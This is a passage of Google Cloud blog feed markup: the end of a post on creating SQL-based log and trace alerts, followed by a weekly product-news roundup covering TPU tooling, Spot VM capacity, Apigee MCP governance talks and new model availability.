&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Condition type: Boolean&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Target column: &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;has_latency_spike&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Trigger condition: Fired when the query returns any row where this column evaluates to true.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Evaluation window / lookback: 10 minutes (or your preferred scheduling interval)&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Before you begin&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Before you can create a SQL-based alert, you need to set up a few things:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Analytics enabled:&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;logs&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/logging/docs/buckets#upgrade-bucket"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Upgrade&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; your log bucket to use Observability Analytics (if not already updated).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;traces&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Cloud Trace must be collected and stored in your project.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Linked BigQuery dataset:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Create a linked BigQuery dataset for the telemetry source (either the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/logging/docs/buckets#link-bq-dataset"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;log bucket&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; or the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/trace/docs/analytics-query-linked-dataset#link-bq-dataset"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;trace dataset&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;). SQL-based alerts query the data through this BigQuery link.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;IAM permissions:&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Grant the IAM roles necessary to create an SQL-based alert policy: &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/roles-permissions/monitoring#monitoring.alertPolicyEditor"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Monitoring AlertPolicy Editor&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/roles-permissions/logging#logging.sqlAlertWriter"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Logging SqlAlert Writer&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (applies to both log and trace alerts).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Notification channels:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/monitoring/support/notification-options"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Configure the notification channels&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (like email or Slack) where you want to receive alerts.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;How to create your alert&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Creating a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/logging/docs/analyze/sql-in-alerting"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;sql-based alert policy&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is straightforward:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Navigate to &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Observability Analytics&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; in the Google Cloud console.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Compose and validate your SQL query.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Select the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Run on BigQuery&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; query engine in the UI.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Click the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Create alert&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; button from the results toolbar.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Define your condition (row count or boolean) and your evaluation schedule.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Add your notification channels, give your alert a clear name, and click &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Save&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Infrastructure as Code (IaC) pipelines, you can also configure alerts via the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/monitoring/alerts/manage-alerts-terraform"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;API&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/monitoring/alerts/manage-alerts-terraform"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Terraform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ready to build more powerful, insightful alerts? Open the &lt;/span&gt;&lt;a href="https://console.cloud.google.com/logs/analytics"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Observability Analytics&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; page in the console and try writing your first SQL query today. You can find more details and advanced examples in the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/logging/docs/analyze/sql-in-alerting"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;official documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/management-tools/alert-with-sql-in-cloud-monitoring-observability-analytics/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-26T16:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud</id>
    <title>What’s new with Google Cloud</title>
    <updated>2026-06-26T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph"&gt;&lt;p&gt;Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. &lt;/p&gt;&lt;hr /&gt;&lt;p&gt;&lt;b&gt;Tip&lt;/b&gt;: Not sure where to find what you’re looking for on the Google Cloud blog? Start here: &lt;a href="https://cloud.google.com/blog/topics/inside-google-cloud/complete-list-google-cloud-blog-links-2021"&gt;Google Cloud blog 101: Full list of topics, links, and resources&lt;/a&gt;.&lt;/p&gt;&lt;hr /&gt;&lt;p&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-aside"&gt;&lt;dl&gt;
    &lt;dt&gt;aside_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: []&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;Jun 22 - Jun 26&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Accelerate TPU model loading while saving RAM on GKE.&lt;br /&gt;&lt;/strong&gt;Large model cold starts often stall scaling and leave high-value TPUs idle. The open-source &lt;strong&gt;Run:ai Model Streamer&lt;/strong&gt; now natively supports TPUs with Google Cloud Storage in&lt;strong&gt; &lt;/strong&gt;&lt;a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://github.com/vllm-project/tpu-inference" rel="noreferrer noopener" target="_blank"&gt;&lt;strong&gt;TPU vLLM 0.18.0&lt;/strong&gt;.&lt;/a&gt; This integration accelerates inference pipelines on GKE by streaming tensors directly into CPU memory, bypassing local disk bottlenecks and the "double-buffering" trap. In benchmarks, loading a 480B parameter model was &lt;strong&gt;over 2x faster&lt;/strong&gt; while cutting peak host memory usage by half. &lt;a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://discuss.google.dev/t/accelerate-tpu-model-loading-while-saving-ram-on-gke/374835" rel="noreferrer noopener" target="_blank"&gt;&lt;strong&gt;Read the full guide and get started today&lt;/strong&gt;&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Stop Training Blind: Scaling AI with the New OpenTelemetry-Based TPU AI Telemetry Collector Agent&lt;br /&gt;&lt;/strong&gt;Google Cloud’s new AI Telemetry Collector agent standardizes TPU monitoring using OpenTelemetry. It optimizes enterprise ML workloads by identifying silent failures and providing zero-cost operational metrics without draining host CPU cycles. The agent seamlessly routes telemetry to Google Cloud Monitoring or Prometheus and custom Grafana setups. Pre-installed on Google-optimized Ubuntu images or available via Docker, it tracks memory, network latency, and core utilization to maximize multi-node training efficiency.&lt;br /&gt;&lt;br /&gt;You can read more of this capability by clicking this &lt;a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://discuss.google.dev/t/stop-training-blind-scaling-ai-with-the-new-opentelemetry-based-tpu-ai-telemetry-collector-agent/375210" rel="noreferrer noopener" target="_blank"&gt;link&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Jun 15 - Jun 19&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Join us for a deep dive into agentic AI control with AppyThings&lt;br /&gt;&lt;/strong&gt;Your integrations aren’t failing—they are evolving. When users interact with AI agents, they no longer arrive directly at your site, resulting in experiences stripped of your context, expertise, and intended experience. Join us on Thursday, June 25, for a community tech talk in partnership with AppyThings to learn how to solve this new gateway challenge. We will explore how MTN laid an integration foundation with the Model Context Protocol (MCP) to deliver accurate, consistent experiences. Our technical experts will demonstrate how to leverage Apigee as a centralized tools management solution to govern agent access. &lt;br /&gt;&lt;br /&gt;&lt;a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/3Sfle0y" rel="noreferrer noopener" target="_blank"&gt;&lt;strong&gt;Register for the session&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Optimize Spot VM Deployments with Capacity Advisor for Spot, Now in Public Preview&lt;br /&gt;&lt;/strong&gt;Google Compute Engine has launched &lt;strong&gt;Capacity Advisor for Spot&lt;/strong&gt; to Public Preview, now open to all customers. This tool turns Spot capacity discovery into a data-driven process by providing real-time deployment recommendations to maximize obtainability and minimize preemption risks. Query the &lt;a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://docs.cloud.google.com/compute/docs/instances/view-vm-availability" rel="noreferrer noopener" target="_blank"&gt;&lt;strong&gt;Capacity Advisor API&lt;/strong&gt;&lt;/a&gt; for obtainability and minimum estimated uptimes, or use the new &lt;a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://console.cloud.google.com/compute/capacityAdvisor" rel="noreferrer noopener" target="_blank"&gt;&lt;strong&gt;Console UI&lt;/strong&gt;&lt;/a&gt; featuring a global availability map, spot price lookups, and historical preemption rate trends to visually find the most cost-efficient compute capacity.&lt;br /&gt;&lt;br /&gt;&lt;a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://docs.cloud.google.com/compute/docs/instances/view-vm-availability" rel="noreferrer noopener" target="_blank"&gt;Get started today&lt;/a&gt; to start optimizing your Spot VM deployments!&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Build a multi-tenant agentic AI system&lt;br /&gt;&lt;/strong&gt;When scaling generative AI across different business units, your teams need specialized AI agents with unique operational rules and tools. Our new reference architecture helps you build a centralized multi-tenant platform to prevent fragmented silos, eliminate data exposure risks, and maintain unified compliance. Read the guide to &lt;a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://docs.cloud.google.com/architecture/multi-tenant-agentic-ai-system" rel="noreferrer noopener" target="_blank"&gt;design and deploy a multi-tenant agentic AI system&lt;/a&gt; in Google Cloud.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;How to Configure Gemini Enterprise to Connect to a Custom MCP Server&lt;br /&gt;&lt;/strong&gt;The Gemini Enterprise MCP Connector was a big announcement at Google Cloud Next because it introduces the ability to connect Gemini Enterprise to MCP servers. This blog &lt;a href="https://medium.com/google-cloud/how-to-configure-gemini-enterprise-to-connect-to-a-custom-mcp-server-2e28adc96420" rel="noopener" target="_blank"&gt;post&lt;/a&gt; provides a step-by-step guide on how to configure your first Custom MCP Server connector using the Google Maps Ground Lite MCP server as an example. Once you understand this flow, you can configure multiple MCP servers with Gemini Enterprise to bring all the context you need.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Jun 8 - Jun 12&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Simplify Multi-Cloud Planning with Cloud Location Finder, now Generally Available&lt;/strong&gt; &lt;br /&gt;Cloud Location Finder provides up-to-date data on public regions, zones, and Google Distributed Cloud Connected locations across Google Cloud, AWS, Azure, and OCI. You can now programmatically discover locations based on provider, proximity, territory, and carbon footprint to optimize your global infrastructure strategy for performance, compliance, and sustainability. &lt;br /&gt;&lt;br /&gt;&lt;a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://cloud.google.com/location-finder/docs" rel="noreferrer noopener" target="_blank"&gt;Get started for free today&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Jun 1 - Jun 5&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Modeling the physical world with BigQuery Graph&lt;/strong&gt;&lt;br /&gt;Managing complex supply chains requires more than just spreadsheets; it requires a digital replica of the physical world. In this &lt;a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://cloud.google.com/blog/products/data-analytics/modeling-a-digital-twin-using-bigquery-graph" rel="noreferrer noopener" target="_blank"&gt;post&lt;/a&gt;, Guru Rangavittal and Candice Chen explore how BigQuery Graph enables organizations to build a digital twin by turning physical assets into an interconnected map of nodes and edges. By moving beyond traditional relational databases, businesses gain real-time clarity into operations—from executing surgical ingredient recalls to analyzing weather-driven logistics risks. Discover how BigQuery Graph transforms reactive firefighting into proactive, precision modeling, allowing you to see critical connections in seconds and future-proof your supply chain.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Apigee for AI: Govern LLMs and MCP Servers (Presented in Spanish)&lt;br /&gt;&lt;/strong&gt;Learn how to securely transition your AI initiatives from experimental prototypes to enterprise-ready deployments. Join Luis Cuellar on June 18 for a technical deep dive (presented in Spanish) exploring Apigee’s latest AI gateway capabilities. Discover how to centralize governance over Model Context Protocol (MCP) servers, protect Large Language Models (LLMs) with robust API gateway security policies, and manage token-based quotas.&lt;br /&gt;&lt;br /&gt;&lt;a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/4dyC2Ie" rel="noreferrer noopener" target="_blank"&gt;&lt;strong&gt;Register for the June 18 Spanish Community TechTalk&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;May 25 - May 29&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.anthropic.com/news/claude-opus-4-8" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Anthropic’s Claude Opus 4.8&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is now available on &lt;/span&gt;&lt;a href="https://console.cloud.google.com/vertex-ai/publishers/anthropic/model-garden/claude-opus-4-8"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;. &lt;/strong&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;As we continue to expand our platform's model offerings, this addition gives organizations more options for handling complex, multi-stage enterprise workflows. Claude Opus 4.8 brings strong capabilities in agentic coding, allowing developers to manage extensive refactors and tracking dependencies over extended sessions.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;API Horizon Munich July 6, 2026: Orchestrating the Next Era of AI and APIs &lt;br /&gt;&lt;/strong&gt;Master the orchestration of next-gen AI and digital ecosystems. Join Google Cloud experts and DACH tech leaders on July 6 for an exclusive look at the Apigee roadmap, Agent Management, and Model Context Protocol (MCP). Gain real-world insights and connect with the regional integration community.&lt;strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="https://goo.gle/4dTxQmo" rel="noopener" target="_blank"&gt;Register now&lt;/a&gt;&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Securing AI Agents: The Extended Agent Gateway Pattern&lt;br /&gt;&lt;/strong&gt;Learn how to prevent autonomous AI agents from invoking unauthorized APIs. Join Apigee Specialist Joel Gauci on June 4 for a technical deep dive into the Extended Agent Gateway pattern. This session covers enforcing Fine-Grained Authorization (FGA), implementing secure token exchange, and establishing Model Context Protocol (MCP) governance at the API gateway layer to protect enterprise backend services.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://goo.gle/4fbAsxg" rel="noopener" target="_blank"&gt;&lt;strong&gt;Register for the June 4 Community TechTalk&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;API-to-Agent Security: Exposing REST APIs to Gemini Enterprise via MCP&lt;br /&gt;&lt;/strong&gt;Connect Gemini Enterprise agents to core data without creating security hazards. Join Google Cloud Specialist Nigel Walters on June 11 to learn how to instantly transform legacy REST APIs into secure Model Context Protocol (MCP) servers. We’ll cover how to safely register tools with Gemini while enforcing gateway-level guardrails like rate limiting and access control policies.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://goo.gle/4nVyjIr" rel="noopener" target="_blank"&gt;&lt;strong&gt;Register for the June 11 Community TechTalk&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;May 18 - May 22&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Chinese Webinar | June 4: AI Command and Control&lt;br /&gt;&lt;/strong&gt;As AI agents move from experimental pilots to core enterprise functions, governance has become a critical next step. Join Google Cloud on June 4th at 10:00 AM (Beijing Time) to learn how to build a secure AI management layer architecture. We'll explore how to develop governed MCP (Model Context Protocol) endpoints, manage tool access to enterprise data, and leverage robust audit logs to operationalize AI. This session also includes a practical demonstration of these governance frameworks on Google Cloud.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://goo.gle/4dx4Lf5" rel="noopener" target="_blank"&gt;Register here&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;GCP Announces New Features to Benchmark and Optimize LLMs for On-Device Use Cases&lt;br /&gt;&lt;/strong&gt;Deploying fine-tuned LLMs from GCP to edge devices like smartphones is complex due to fragmented hardware. Google AI Edge Portal bridges this gap, giving GCP developers the ability to test AI performance on 120+ Android devices, representing the full diversity of high, medium, and low tier smartphones on the market today. This week at I/O, we announced brand new &lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/benchmark-llms-on-device-with-ai-edge-portal" rel="noopener" target="_blank"&gt;capabilities&lt;/a&gt; to benchmark and debug LLM performance across these devices. &lt;a href="https://docs.google.com/forms/d/e/1FAIpQLSfTcGPycQve8TLAsfH46pBlXBZe9FrgJAClwbF7DeL1LgVn4Q/viewform" rel="noopener" target="_blank"&gt;Sign-up&lt;/a&gt; to utilize these new features in private preview today.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;May 11 - May 15&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Build Your AI &amp;amp; MCP Control Tower for Universal Governance&lt;br /&gt;&lt;/strong&gt;Master the future of agentic security with Apigee. Join our Community TechTalk on May 21 to discover how Apigee serves as a central "Control Tower" for the Model Context Protocol (MCP). We will explore how new JSON-RPC tool authorization enables fine-grained access policies across your organization, ensuring secure and scalable AI deployments. Whether managing internal tools or external users, learn to govern your agentic ecosystem with absolute precision. This session is designed for global coverage across EMEA and AMER regions.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://goo.gle/4u9slWF" rel="noopener" target="_blank"&gt;Register for the May 21 Community TechTalk&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Apr 27 - May 1&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Master Your Launch: The Apigee Production Go-Live Checklist&lt;br /&gt;&lt;/strong&gt;Ensure a secure launch with the Apigee production guide. Join Nicola Cardace on May 28 to explore security guardrails, including IAM roles, mTLS configurations, and encrypted KVM migrations. Scheduled at 11 AM EDT / 5 PM CEST to support EMEA and AMER teams, this TechTalk provides the technical roadmap you need to flip the switch with absolute confidence.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;a href="https://goo.gle/4elMCTI" rel="noopener" target="_blank"&gt;Register for the May 28 Community TechTalk&lt;/a&gt;&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Transforming APIs into Governed Agentic Tools on the Google Cloud Agentic Platform&lt;br /&gt;&lt;/strong&gt;&lt;span&gt;Turn your APIs into secure, governed agentic tools on the Google Cloud Agentic Platform. Join Specialist Christophe Lalevée on May 7 for a technical deep dive into AI productization. Scheduled at 5 PM CEST / 11 AM EDT to maximize coverage for developers across EMEA and AMER, this session explores the integration and governance frameworks required to scale enterprise-ready AI with confidence.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://goo.gle/3PfWm7M" rel="noopener" target="_blank"&gt;Register for the May 7 Community TechTalk&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/compute/docs/accelerator-optimized-machines#g4-machine-types" rel="noopener" target="_blank"&gt;Fractional G4 VMs&lt;/a&gt; are Generaly Available, providing a highly efficient and cost-effective entry point for AI and graphics workloads. These new configurations, using NVIDIA virtual GPU (vGPU) technology, allow you to leverage the power of the NVIDIA RTX PRO 6000 Blackwell Server Edition GPUs in flexible, smaller increments, so you can right-size your infrastructure to match the specific demands of your applications. By providing more granular access to advanced hardware, fractional G4 VMs let you optimize resource allocation and reduce overhead without sacrificing performance. You can now select from additional GPU slice sizes for your specific needs:
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;1/2 GPU:&lt;/strong&gt; Ideal for more intensive tasks such as LLM inference, robotics sensor simulation, and high-fidelity 3D rendering.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;1/4 GPU:&lt;/strong&gt; Optimized for mainstream workloads, including mid-range creative design, video transcoding, and real-time data visualization.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;1/8 GPU:&lt;/strong&gt; Great for lightweight applications such as remote desktops, productivity tools, and entry-level streaming services.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Transitioning AI from a sandbox prototype to an enterprise-grade system is a major hurdle. A monolithic script won't suffice for widespread deployment. To achieve true scale and reliability with Gemini, organizations must adopt service-oriented micro-agent architectures, establish Zero-Trust security, and implement rigorous EvalOps. Master the "Agentic Maturity Ladder" to ensure your AI &amp;amp; Agentic solutions are robust, secure, and ready for the real world.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://lnkd.in/gHBH8cTv" rel="noopener" target="_blank"&gt;Watch the deep dive&lt;/a&gt; and &lt;a href="https://discuss.google.dev/t/beyond-the-prototype-scaling-production-grade-agents-with-gemini/356140" rel="noopener" target="_blank"&gt;read the developer blog&lt;/a&gt; to learn more.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ML Development in VS Code with Google Cloud Power: Workbench Extension Now Available&lt;br /&gt;&lt;/strong&gt;Data scientists and developers can now combine the local productivity of VS Code with the scalable infrastructure of Google Cloud. The new Google Cloud Workbench Notebooks extension allows you to connect to and run notebooks on managed cloud environments directly within your local IDE. This integration streamlines the ML lifecycle by eliminating context switching and providing high-performance compute for complex workloads in a familiar interface. As part of our commitment to the developer ecosystem, the extension is fully open-sourced to support community-driven innovation.
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Install from Marketplace:&lt;/strong&gt; &lt;a href="https://marketplace.visualstudio.com/items?itemName=GoogleCloudTools.workbench-notebooks" rel="noopener" target="_blank"&gt;GoogleCloudTools.workbench-notebooks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Contribute on GitHub:&lt;/strong&gt; &lt;a href="https://github.com/GoogleCloudPlatform/colab-enterprise-vscode" rel="noopener" target="_blank"&gt;colab-enterprise-vscode&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Apr 20 - Apr 24&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Announcing the 2026 Google Cloud Partners of the Year&lt;br /&gt;&lt;/strong&gt;Google Cloud is honored to celebrate the winners of the 2026 Partner of the Year awards! These awards recognize an exceptional group of partners across AI, Security, Infrastructure, and more, who have demonstrated a commitment to customer success. From global system integrators to specialized startups, these winners are leveraging the power of Google Cloud to solve complex challenges and drive digital transformation worldwide. Join us in congratulating these organizations for their innovation, collaboration, and impactful results over the past year.&lt;br /&gt;&lt;br /&gt;See the &lt;a href="https://cloud.google.com/blog/topics/partners/2026-partners-of-the-year-winners-next26"&gt;2026 Partner Award winners&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Apr 13 - Apr 17&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;We're excited to announce the &lt;strong&gt;Public Preview of Datastream’s metadata integration with Knowledge Catalog&lt;/strong&gt;. This is the first step in our vision to provide a centralized, "single pane of glass" for all Datastream assets. The enhancement automatically synchronizes Streams, Connection Profiles, and Private Connections, eliminating data silos. It enhances discoverability, allowing you to search for Datastream assets using the same interface as BigQuery tables. Centralized governance is also provided, making your real-time data estate more transparent and easier to manage.&lt;/li&gt;
